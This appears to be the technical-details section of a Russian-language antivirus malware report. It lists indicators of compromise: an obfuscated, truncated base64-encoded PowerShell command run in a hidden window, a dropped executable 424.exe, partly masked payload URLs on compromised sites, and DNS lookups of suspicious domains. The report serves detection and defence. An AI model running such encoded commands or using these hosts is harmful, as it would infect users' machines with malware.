Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABPAG0AcQB1AGQAcABjAG4AcgBqAHMAPQAnAEkAdwBzAG8AYgBiAHAAZgAnADsAJABJAHoAYQByAGQAYgBmAHUAcAAgAD0AIAAnAD...
- %HOMEPATH%\424.exe
- %HOMEPATH%\424.exe
- http://www.ci#######nstructionlending.com/wp-admin/s92708/
- http://www.vi####talyca.com/softaculous/gy3l713/
- DNS ASK ci#######nstructionlending.com
- DNS ASK to#####kdownload.com
- DNS ASK te###.#ode2laroute.com
- DNS ASK sa#######haam.000webhostapp.com
- DNS ASK vi####talyca.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABPAG0AcQB1AGQAcABjAG4AcgBqAHMAPQAnAEkAdwBzAG8AYgBiAHAAZgAnADsAJABJAHoAYQByAGQAYgBmAHUAcAAgAD0AIAAnAD...' (со скрытым окном)